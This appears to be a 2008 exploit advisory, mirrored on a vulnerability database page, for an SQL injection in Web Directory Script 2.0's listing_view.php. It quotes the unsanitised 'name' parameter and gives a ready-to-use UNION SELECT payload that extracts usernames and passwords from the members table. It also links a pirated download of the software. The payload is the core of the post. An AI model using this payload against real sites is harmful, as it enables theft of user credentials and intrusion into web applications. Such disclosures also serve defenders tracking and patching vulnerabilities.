Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

🗓️ 26 Aug 2008 00:00:00Reported by RootType

Web Directory Script SQL Injection Vulnerability in listing_view.php version 2.


                                                Web Directory Script &lt;= 2.0 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz 
Home Page: www.antichat.ru
Date found: 23.08.08
Product: Web Directory Script
Version: 2.0
Download script: http://rapidshare.com/files/121448809/W3bDirScr2-nullscript.net.rar
Password: nullscript.net
Vulnerability Class: SQL Injection

listing_view.php

Vuln code:

$friendly_url=$_GET['name'];

http://localhost/[installdir]/

magic_quotes_gpc = Off

Exploit:

listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*

Thanks: Zitt, rijy, Koller, NOmeR1, $n@]&lt;e, n0ne, +toxa+, [cash], ettee, HiM@S and All members of antichat.ru and xaker.name .

26 Aug 2008 00:00Current

7.1High risk

Vulners AI Score7.1

Web Directory Script &lt;= 2.0 (name) SQL Injection Vulnerability

Web Directory Script <= 2.0 (name) SQL Injection Vulnerability